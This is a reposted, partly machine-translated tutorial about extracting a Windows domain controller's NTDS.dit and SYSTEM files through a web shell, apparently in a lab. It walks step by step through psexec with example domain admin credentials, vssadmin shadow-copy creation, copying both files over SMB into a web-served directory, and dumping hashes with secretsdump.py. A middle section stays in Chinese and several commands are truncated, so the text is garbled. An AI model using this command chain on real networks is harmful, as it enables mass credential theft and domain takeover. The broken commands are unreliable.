Shulou(Shulou.com)05/31 Report--

This post is about how to export domain-controlled ntds.dit remotely via Webshell. Xiaobian thinks it is quite practical, so share it with everyone for reference. Let's follow Xiaobian and have a look.

I faced the same problem during penetration testing (no public IP server). After discussing this a little bit, I found a way to do that through WebShell if we had the "AD Domain Admin" user credentials.

Here we assume:

1. AD domain control machine (queen.DC1.indishell.lab - 192.168.56.200)

Windows machine controlled-connected to AD (LABONE - 192.168.56.101)

3. Administration Get Windows AD domain administrator user (you can use any exploit available, here I use "MS14-025" to get domain administrator user password)

Now I can access the web shell on a Windows machine, which connects to the domain, namely "LABONE," with the IP "192.168.56.101" The domain administrator's username is "user1" and password is "ica_1046."

Here, I will use the following two binary files:

1、psexec.exe

< - Windows内部工具 2、vssadmin < - 用于创建/删除Windows驱动器的卷影副本的命令 无论如何，如果我们设法在Windows AD域控机器上运行"vssadmin"命令，"vssadmin"命令将生成"C"盘的卷影副本，并且从该卷影副本我们可以复制"ntds.dit"和"SYSTEM"文件。为了实现上述任务，我们将使用"psexec.exe"，如果我们使用"elevated"选项（通过指定-h）指定目标计算机IP、域管理员用户名及其密码，则可以在远程Windows计算机上执行命令。我们需要通过web shell在Windows机器"LABONE"上上传psexec.exe。从Web shell我们将使用"vssadmin"命令指定AD域控机器IP，域管理员用户名及其密码。 psexec文件将远程执行Windows AD域控计算机上的vssadmin命令。在创建"C"盘卷影副本之后，我们需要将"ntds.dit"和"SYSTEM"文件从该卷影副本复制到我们具有Web shell访问权限的机器上，即Windows域机器"LABONE"。这个任务可以通过使用"psexec"来完成，我们只需在"copy"命令中指定目标AD域控机器的IP，域管理员用户名和密码即可，请使用SMB将ndts.dit和SYSTEM文件从卷影副本复制到LABONE机器。这里，我将这些文件复制到了我转储psexec文件的同一目录下。 使用"psexec"在远程主机上执行命令的常规用法： psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute" 就我而言，我应填写如下信息： remote_IP 192.168.56.200（queen.DC1.indishell.lab） user_name user1 password_of_the_user ica_1046 我在Windows域机器"LABONE"上具有web shell访问权限，并在服务器上传了psexec二进制文件。 首先，我们先来检查下是否有"C"盘的卷影副本可用。你可以使用以下命令来列出可用的卷影副本： vssadmin list shadows 这里，web shell无法显示远程主机上psexec binary执行的所有命令输出，所以我将命令输出重定向到了"LABONE"上，并保存在C:\xampp\htdocs\box\ps\目录下。执行该步骤的命令如下： PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin list shadows >

\\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"

The Web shell shows psexec executing commands on a remote Windows AD domain-controlled machine. If all goes well, we'll get a file named "out.txt" in directory "C:\xampp\htdocs\box\ps" that will contain the output of the "vssadmin list shadows" command executed on AD Domain Control (192.168.56.200).

You can see that the out.txt file has been generated in the directory, let's take a look at the contents below.

The contents of the "out.txt" file indicate that the target domain-controlled machine does not have any shadow copies so far.

Let's create a shadow copy of drive "C" to steal the "ntds.dit" and "SYSTEM" files.

The commands for creating a shadow copy of drive c are as follows:

vssadmin create shadow /for=C:

We need to have the name of the shadow copy of the newly created "C" disk that will be in the output of the command, so we will redirect the output of the above command to the machine we have web shell access to.

To copy the "ntds.dit" and "SYSTEM" files from the target machine, we need to have the name of the shadow copy. The final order was:

PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin create shadow /for=C: >

With the above command, psexec is executing the command on the Windows AD domain-controlled machine (192.168.56.200) to create a shadow copy of the "C" drive and then redirecting the output of the command to the "C: \xmpp\htdocs\box\ps\out.txt" file on the "LABONE" machine.

The contents of the "out.txt" file will tell us where the shadow copy is located.

In the screenshot above we can see that the shadow copy volume name is "\\?\ GLOBALROOT\Device\HarddiskVolumeShadowCopy5\"。

The locations of the "ntds.dit" and "SYSTEM" files are as follows:

"shadow_copy_volume_name\Windows\NTDS\NTDS.dit"

"shadow_copy_volume_name\Windows\System32\config\SYSTEM"

Namely:

"\\?\ GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit"

"\\?\ GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM"

Let's copy the "ntds.dit" file from the target Windows AD domain-controlled machine using the following command:

PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\ GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit \\192.168.56.101\C$\xampp\htdocs\box\ps\"

This command copies the "ntds.dit" file from the remote machine (192.168.56.200) to the "C:\xampp\htdocs\box\ps\" directory of the "LABONE" machine (192.168.56.101).

You can see that the web shell shows that a file has been copied from the target DC machine to my machine. Let's confirm and check "C:\xampp\htdocs\box\ps" to see if the "ntds.dit" file has been copied successfully.

As shown above, the "ntds.dit" file has been successfully copied to the "LABONE" machine.

Again, we use this command to copy the "SYSTEM" file:

PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\ GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM

Command execution succeeds and the Web shell displays the message "1 file copied." Check again and confirm successful execution.

You can see that the "SYSTEM" file has also been successfully copied to the "LABONE" machine. We can download these files from here using a web shell.

Now we can extract Domain, udi, rid LM and NT hashes from the "ntds.dit" and "SYSTEM" files using the python script secretsdump.py. The order reads as follows:

python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

The results were as follows:

Thank you for reading! About "how to export domain control ntds.dit remotely through Webshell" this article is shared here, I hope the above content can be of some help to everyone, so that everyone can learn more knowledge, if you think the article is good, you can share it to let more people see it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.